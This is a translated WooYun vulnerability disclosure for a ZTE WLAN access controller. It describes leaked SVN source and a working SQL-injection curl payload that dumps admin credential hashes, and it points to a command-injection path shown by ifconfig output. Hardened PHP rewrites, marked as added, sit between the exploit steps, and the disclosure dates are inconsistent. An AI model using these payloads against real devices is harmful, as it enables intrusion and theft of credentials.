
Vulnerability summary

Defect ID: wooyun-2015-0151898

Title: ZTE W-LAN wireless access controller, from information disclosure to cmdshell

Vendor: 中兴通讯股份有限公司 (ZTE Corporation)

Author: 路人甲

Submitted: 2015-11-07 21:37

Fixed: 2015-12-17 14:48

Published: 2015-12-17 14:48

Vulnerability type: sensitive information disclosure

Severity: high

Self-assessed Rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org



Vulnerability details

Disclosure status:

2015-11-07: Details sent to the vendor, awaiting vendor action
2015-11-10: Vendor has confirmed; details disclosed to the vendor only
2015-11-13: Details opened to third-party security partners (绿盟科技唐朝安全巡航)
2016-01-04: Details opened to core white hats and domain experts
2016-01-14: Details opened to regular white hats
2016-01-24: Details opened to intern white hats
2015-12-17: Details disclosed to the public

Brief description:

As the title says.

Detailed description:

ZTE WLAN wireless access controller
has an exposed SVN directory, which leaks the source code.

[two screenshots omitted]


Most of the code that requires privileges includes isLogin, for example:

<?php /*
File: sync_config.php
Author: chent
Change log:
2012-03-15 liangjl Added: refresh the main page after this page completes
20110822 liangjl When restoring the system configuration, the AC name must also be reset to its default
20110208, pangm, changed how the reboot command is invoked
20101028, pangm, strip the "::ffff:" prefix from IP addresses when writing syslog entries
20100824, pangm, implemented the restore-system-configuration operation
20090827, chent, changed the config save-time format to e.g. 2009-08-27 17:33:27, and update it only when the config is saved
20090822, chent, keep a backup, just in case
20090822, chent, PHP cannot move directories with rename() on the trimmed-down system, so the system mv command is called instead
*/ ?>
<?php include 'isLogin.php' ?>
<?php
session_start();
?>


So, listing the PHP files that never include islogin.php:

grep -i -r -L 'islogin.php' --include='*.php' ./|more
.//ap/getIfApListFileExit.php
.//apgroup/getChannelByCountryCode.php
.//apgroup/wait_apgroup_inport.php
.//func/LicenseFunc.php
.//include/page.php
.//include/template.php
.//index.php
.//log/getIfApGroupExist.php
.//login.php
.//policy/IsWlanServiceEnable.php
.//policy/wait_policy.php
.//resetWebsvr.php
.//wait.php
.//wlan/getIfApUserExist.php
.//wlan/IfPasswMatch.php
.//wlan/SomeOrNone.php
.//wlan/wait_wlan.php
.//wlanport/getSsidByGroupid.php


A quick search turned up an SQL injection:

<?php
/*********************************************************
**File: get channel values by country code
**Author: liucj
**Date: 2013-04-08
**Modify history:
**********************************************************/
?>
<?php
$CountryCode = $_POST['CountryCode'];
$ChannelType = $_POST['ChannelType'];
$DBNAME = "sqlite:/icac/db/icac_cfg/icac_cfg.db";
$dbh = new PDO($DBNAME);
$sql = "select ChannelValue from CCAndChannelRelations where CountryCode = '".$CountryCode."' and ChannelType = '".$ChannelType."'";
$stmt = $dbh->query($sql);
$result = $stmt->fetchAll();
$stmt = null;
$dbh = null;
echo json_encode($result);
?>


Exploit:

curl '**.**.**.**/apgroup/getChannelByCountryCode.php' -d "CountryCode=' union select UserName || '|'  || PassWord from LoginAccount --" -k
[{"ChannelValue":"admin|b7d5f153148d530064bb4b179b947349","0":"admin|b7d5f153148d530064bb4b179b947349"},{"ChannelValue":"icac|929193c8d183f6837c88b8a03e8c0bed","0":"icac|929193c8d183f6837c88b8a03e8c0bed"},{"ChannelValue":"user|c24a542f884e144451f9063b79e7994e","0":"user|c24a542f884e144451f9063b79e7994e"}]
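A hardened version of getChannelByCountryCode.php, added here as an example and not ZTE's code: it adds the isLogin.php include the original file lacks and binds both POST parameters instead of concatenating them into the query. The input-format checks assume a two-letter country code and a numeric channel type, which the report does not state.

```php
<?php
// Added example, not ZTE's code: hardened replacement for
// getChannelByCountryCode.php. Two fixes: the page is no longer reachable
// without the isLogin.php check the other pages use, and the query is a
// prepared statement, so the "' union select ..." payload from the report
// is treated as a literal country code and matches nothing.
include 'isLogin.php';

$countryCode = (string)($_POST['CountryCode'] ?? '');
$channelType = (string)($_POST['ChannelType'] ?? '');

// Assumed formats (not stated in the report): two-letter country code and
// a numeric channel type. Rejecting anything else is defence in depth on
// top of parameter binding, which alone is sufficient against injection.
if (!preg_match('/^[A-Za-z]{2}$/', $countryCode)
    || !preg_match('/^[0-9]{1,3}$/', $channelType)) {
    http_response_code(400);
    echo json_encode(['error' => 'invalid CountryCode or ChannelType']);
    exit;
}

$dbh = new PDO('sqlite:/icac/db/icac_cfg/icac_cfg.db');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Same table and columns as the original query, but with placeholders.
$stmt = $dbh->prepare(
    'SELECT ChannelValue FROM CCAndChannelRelations'
    . ' WHERE CountryCode = :cc AND ChannelType = :ct'
);
$stmt->execute([':cc' => $countryCode, ':ct' => $channelType]);

// FETCH_ASSOC also drops the duplicate numeric keys ("0": ...) seen in the
// report's JSON output, which came from the default FETCH_BOTH mode.
echo json_encode($stmt->fetchAll(PDO::FETCH_ASSOC));
```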


From here, every administrative function is available:

cat ap/ap_hardware_info.php 
<!--
/*********************************************************
**File: AP software/hardware configuration information
**Author: 冯朝晖
**Date: 2009-04-21
**Modify history:
*
**********************************************************/
-->
<?php include '../isLogin.php' ?>
<?php
safeVar($_COOKIE);
safeVar($_GET);
safeVar($_POST);
safeVar($_REQUEST);
?>
<html>
<head>
<meta http-equiv="Content-Language" content="zh-cn">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="/css/<?=$_COOKIE["_CSS_MAIN"]?>" rel="stylesheet" type="text/css">
<title><?=HTITLE_SOFTHARD_CFGINFO?></title><!--software/hardware configuration information-->
</head>
<?php
$ApId = $_REQUEST['ApId'];
$ip = $_REQUEST['ip'];
$ManufId = $_REQUEST['ManufId'];

$arrColName = array("EquipModel" => ROW_DEVICETYPE,//"device model",
"HardVer" => ROW_HARDVER,//"hardware version",
"SoftwareName" => "软件名称",
"SoftVer" => ROW_SOFTVER,//"software version",
"FirmwareVer" => ROW_FIRMVER,//"firmware version",
"CpuModel" => "CPU型号",
"CpuSpeed" => "CPU处理能力",
"MemCapacity" => ROW_MEMORY_CAPACITY,//"memory capacity",
"MemModel" => "内存型号",
"FlashCapacity" => ROW_FLASH_CAPACITY);//"FLASH capacity");

$cmd = "get_shm_apinfo -a ".$ApId;
$arr_ApInfo = array();
$ret_val = -1;
$last_line = exec($cmd, &$arr_ApInfo, &$ret_val);
//echo "last_line=".$last_line."<br>";
//echo "ip=".$ip."<br>";


Done!

ifconfig
eth0 Link encap:Ethernet HWaddr 84:74:2A:AB:EA:40
inet addr:**.**.**.** Bcast:**.**.**.**55 Mask:**.**.**.**
inet6 addr: fe80::8674:2aff:feab:ea40/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:814196149 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:15
RX bytes:194057593507 (180.7 GiB) TX bytes:0 (0.0 B)
Interrupt:25 Base address:0xc000
eth0:1 Link encap:Ethernet HWaddr 84:74:2A:AB:EA:40
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:25 Base address:0xc000
eth1 Link encap:Ethernet HWaddr 84:74:2A:AB:EA:41
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:15
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:26 Base address:0xd000
eth2 Link encap:Ethernet HWaddr 84:74:2A:AB:EA:42
inet6 addr: fe80::8674:2aff:feab:ea42/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:15
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:27 Base address:0xe000
eth3 Link encap:Ethernet HWaddr 84:74:2A:AB:EA:43
inet6 addr: fe80::8674:2aff:feab:ea43/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:15
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:28 Base address:0xf000
eth4 Link encap:Ethernet HWaddr 84:74:2A:AB:EA:44
inet6 addr: fe80::8674:2aff:feab:ea44/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:15
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:29 Base address:0x1000
lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:8862210 errors:7182532 dropped:7182532 overruns:0 frame:0
TX packets:8862210 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:570985424 (544.5 MiB) TX bytes:570985424 (544.5 MiB)
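The exec() call from ap_hardware_info.php hardened, as an added example (not ZTE's code): ApId is whitelisted as a decimal integer and wrapped in escapeshellarg(), so whatever reaches get_shm_apinfo can only be a number. The integer format is an assumption; the report only shows that the value flowed unchecked into the shell and that the safeVar() calls did not stop it.

```php
<?php
// Added example, not ZTE's code: the exec() block from ap_hardware_info.php
// rewritten so that $_REQUEST['ApId'] cannot carry shell metacharacters.
// The original concatenated the raw value into "get_shm_apinfo -a ...",
// and the report's ifconfig output shows the existing safeVar() calls did
// not prevent command execution.
include '../isLogin.php';

function run_apinfo(string $apId): array
{
    // Assumption: AP identifiers are plain decimal integers. The whitelist
    // is the primary control; escapeshellarg() is the fallback so that a
    // later relaxation of the pattern still cannot break out of the
    // argument.
    if (!preg_match('/^[0-9]{1,10}$/', $apId)) {
        throw new InvalidArgumentException('ApId must be numeric');
    }
    $cmd = 'get_shm_apinfo -a ' . escapeshellarg($apId);

    $output = [];
    $retVal = -1;
    // Modern by-reference signature; the original used call-time '&',
    // which PHP 5.4+ rejects.
    exec($cmd, $output, $retVal);
    if ($retVal !== 0) {
        throw new RuntimeException("get_shm_apinfo exited with status $retVal");
    }
    return $output;
}

try {
    $arr_ApInfo = run_apinfo((string)($_REQUEST['ApId'] ?? ''));
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('invalid ApId');
}
```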


Note: don't trust sqlmap.

Proof of vulnerability:

Cases:

**.**.**.**//.svn/entries

Fix:

Delete the .svn directories and similar files.

Copyright: please credit 路人甲@乌云 when reproducing.


Vulnerability response

Vendor response:

Severity: high

Vulnerability Rank: 12

Confirmed: 2015-11-10 17:06

Vendor reply:

Thanks for your attention.

Latest status:

None yet.